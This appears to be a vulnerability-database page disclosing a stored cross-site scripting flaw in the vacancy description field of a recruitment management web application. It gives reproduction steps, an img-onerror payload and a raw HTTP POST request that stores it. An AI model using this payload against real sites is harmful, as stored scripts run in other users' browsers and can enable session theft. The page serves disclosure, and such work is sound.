Thursday, November 4, 2021

Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)

# Exploit Title: Company's Recruitment Management System 1.0 -  'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage:
# Software Link:
# Version: 1
# Tested on: Windows 10,XAMPP

Step to reproduce:-
1)Login with staff account & Navigate to  Vacancies tab.

2)Click on add new vacancies .Put any random information  on other field except description & go to the description window .

3)In the description field  select insert  link .

5) In Text to display the field add the following payload .

"><img src=x onerror=alert(1)>

*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details  *


POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
Content-Length: 1012
DNT: 1
Connection: close
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="title"

Content-Disposition: form-data; name="designation_id"

Content-Disposition: form-data; name="slots"

Content-Disposition: form-data; name="status"

Content-Disposition: form-data; name="description"

<p><br><a href="" target="_blank">"><img src="x"
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore